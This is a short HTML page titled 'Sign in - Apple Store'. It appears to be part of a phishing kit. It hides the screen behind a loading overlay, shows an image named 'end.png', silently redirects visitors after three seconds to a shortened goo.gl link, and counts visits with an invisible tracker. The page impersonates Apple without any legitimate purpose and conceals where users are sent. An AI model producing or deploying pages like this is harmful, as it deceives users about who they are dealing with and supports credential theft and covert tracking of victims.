<html>
<head>
	<title>Sign in - Apple Store</title>
	<link rel="icon" type="image/png" href="img/favicon.png" />
	<meta http-equiv="refresh" content="3; url=http://goo.gl/LGTJyb" />
	<style>
		#loading {
		 background: #f1f1f1;
		 height: 100%;
		 left: 0;
		 position: fixed;
		 top: 0;
		 width: 100%;
		 z-index: 9999;
		}

		body {
		 margin-top: 15;
		 background: #f1f1f1;
		}

		.page {
		 background-image: url("img/end.png");
		 background-repeat: no-repeat;
		 height: 400px;
		 width: 986px;
		 position: relative;
		}
	</style>
	<script>
		window.onload=function() {
			document.getElementById('loading').style.display='none';
		}
	</script>
</head>
<body>
	<div id="loading"></div>
	<center>
		<div class="page">
		<div>
<script type="text/javascript">
var sc_project=9710032; 
var sc_invisible=1; 
var sc_security="2bd741f4"; 
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="free hit
counter" href="http://statcounter.com/free-hit-counter/"
target="_blank"><img class="statcounter"
src="http://c.statcounter.com/9710032/0/2bd741f4/1/"
alt="free hit counter"></a></div></noscript>
	</center>
</body>
</html>